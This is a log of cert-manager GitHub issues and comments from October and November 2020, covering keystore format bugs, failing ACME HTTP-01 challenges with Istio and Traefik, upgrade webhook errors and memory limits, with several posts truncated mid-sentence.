**Is your feature request related to a problem? Please describe.**
We are currently working on external issuer for cert manager, and we would like to be able to add multiple trustedCertEntries to JKS truststore.

We are able to set the certificateRequest.Status.CA with a PEM containing multiple entries, but for the JKS truststore we end up with only first entry from the PEM, while for the ca.crt f

[2020-10-30 12:45] remikj opened #3428 "JKS and PKCS12 Keystores are inconsistent."
**Describe the bug**:
When requesting keystore in JKS format rootCA is added as trustedCertEntry to the keystore (under "ca" alias), while for PKCS12 it is appended to the certificate chain. (It is also inconsistent with tls.crt which has certificateChain without the rootCA).

**Expected behaviour**:
Same behaviour for both formats. Ideally certificate chain should contain only certificates set as

[2020-10-30 15:14] yaminisridaran commented on #2526
I am facing the same issue. Can anyone please help me. The http01 challenge via Istio is returning 405 error

[2020-10-30 20:11] yaminisridaran opened #3429 "Waiting for HTTP-01 challenge propagation: wrong status code '404', expected '200'"
**Describe the bug**:
A clear and concise description of what the bug is.

I am configuring acme issuer type using cert-manager with istio. Certificate is not getting issued. Challenge is pending state.
Challenge error **Waiting for HTTP-01 challenge propagation: wrong status code '404', expected '200'**

**My Setup:**
Issuer:
[code]

Gateway:
[code]
DestinationRule:
[code]

Certificate:
[code]

i

[2020-10-30 21:45] dimm0 commented on #2757
I'm hitting this too, updated from 0.13 to 1.0.4

[2020-10-30 22:10] dimm0 opened #3430 "After upgrade from 0.13 to 1.0.4 convert webhook fails with "x509: certificate signed by unknown authority""
**Describe the bug**:
After upgrade from 0.13 to 1.0.4 via yaml files (not helm), the convert webhook fails with:

[code]

**Expected behaviour**:
Convertion works fine

**Steps to reproduce the bug**:
Upgrade from 0.13 to 1.x version

**Environment details:**:
- Kubernetes version (e.g. v1.10.2):
1.18.6

- Cloud-provider/provisioner (e.g. GKE, kops AWS, etc):
baremetal

- cert-manager version (e.

[2020-10-30 22:13] dimm0 commented on #3430
The webhook has lots of:

`1030 22:12:12.332374       1 logs.go:58] http: TLS handshake error from 10.244.0.1:62741: remote error: tls: bad certificate`

[2020-10-30 22:51] dimm0 commented on #3430
Re-read the docs again, seeing the backup and restore process. I guess that's for all clusters, not for k8s below 1.14?
Will do that...

[2020-10-31 00:22] dimm0 commented on #3430
I screwed the cluster trying to delete the CRDs =(
The section in https://cert-manager.io/docs/installation/upgrading/upgrading-0.16-1.0/ about deleting everything looks like applied to k8s 1.14, not all versions.

Is there a way to use webhook in permissive mode, without any certs?

[2020-10-31 02:51] dimm0 commented on #3430
Restored the cluster from backup...

[2020-10-31 02:51] #3430 closed

[2020-10-31 03:51] liejuntao001 commented on #2911
I append one more annotation to make it work

`
    solvers:
    - http01:
        ingress:
          class: traefik
          ingressTemplate:
            metadata:
              annotations:
                traefik.ingress.kubernetes.io/router.tls: "true"
                traefik.ingress.kubernetes.io/frontend-entry-points: "https"
`

[2020-10-31 13:26] coderanger commented on #3429
Answered in Slack, you can't issue a LetsEncrypt certificate for a domain you don't control.

/close

[2020-10-31 16:14] tareksalem opened #3431 "Certificate creation stuck at Created new CertificateRequest resource"
**Describe the bug**:
I am using cert-manager v1.0.0 on GKE, I tried to use the staging environment for acme and it worked fine but when shifting to production I can find the created certificate stuck at Created new CertificateRequest resource and nothing changes after that
**Expected behavior**:
I expect to see the creation of the certificate to be succeeded and change the status of the certifica

[2020-11-01 09:51] ofer-tvil commented on #3144
@meyskens
I upgraded cert-manager today to v1.0.4, problem still exist.
When memory is 400M it works, with 300M i got OOMKilled

`
kubectl -n cert-manager get pods

NAME                                       READY   STATUS      RESTARTS   AGE
cert-manager-b876c55d7-kd7mg               1/1     Running     0          8m39s
cert-manager-cainjector-64d848d9cc-9ndl9   0/1     OOMKilled   1          68s

[2020-11-01 10:35] MerNat commented on #3422
I'm also getting this issue; being 3 hours until I created both the issuer and certificate object. Any fix for that?

[2020-11-01 17:14] tareksalem commented on #3431
any reply on this issue ?

[2020-11-01 21:37] #3421 closed

[2020-11-02 10:04] yaminisridaran commented on #3429
I am still facing the issue

[2020-11-02 21:07] maaroen opened #3432 "Forbidden when creating resource in API group"
**Describe the bug**:
I have a fresh cluster running on a raspberry pi and I'm trying to use cert-manager to issue wildcard certificates using a dns-01 challenge, but the logs of the challenge give the following error:
transip.cert-manager.webhook.transip is forbidden: User "system:serviceaccount:cert-manager:cert-manager" cannot create resource "transip" in API group "cert-manager.webhook.transip

[2020-11-03 06:49] MerNat commented on #3422
I found out that the domain name that I've added to the certificate to be approved has already been registered in another cluster. That's why it can not approve it again, but it perfectly worked once I changed the domain name to a different one.

[2020-11-03 07:42] jjacob27 commented on #3422
Ah... in my case, I remember that i had torn down a cluster in which it was working and then recreated another cluster with the same domain name

In such a case, is there a waiting time?

[2020-11-03 11:01] serhiiromaniuk commented on #2487
As for me, I check all related to certs resources and reconfigure `Issuer Ref` correctly.

[2020-11-03 14:14] kriston13 commented on #1636
Hi.
I'd dearly love an answer to this too.
We're using a bunch of custom gateways for different namespaces & subdomains, but can't get http01 challenges solved.

[2020-11-04 03:06] wutz commented on #1636
We use the priority rules of istio-ingressgateway in our cluster.

[2020-11-04 03:25] wutz commented on #1636
@kriston13

We use the internal priority rules of istio-ingressgateway in our cluster.
1. Remove port 80 definition of specific domain name in all custom Gateway
2. Add port 80 definition matching all domain names
[code]
3. Add a ClusterIssuer or Issuer definition
[code]

Simply understand how this works
1. When creating a Certificate for the first time, cert-manager will create an Ingress of a sp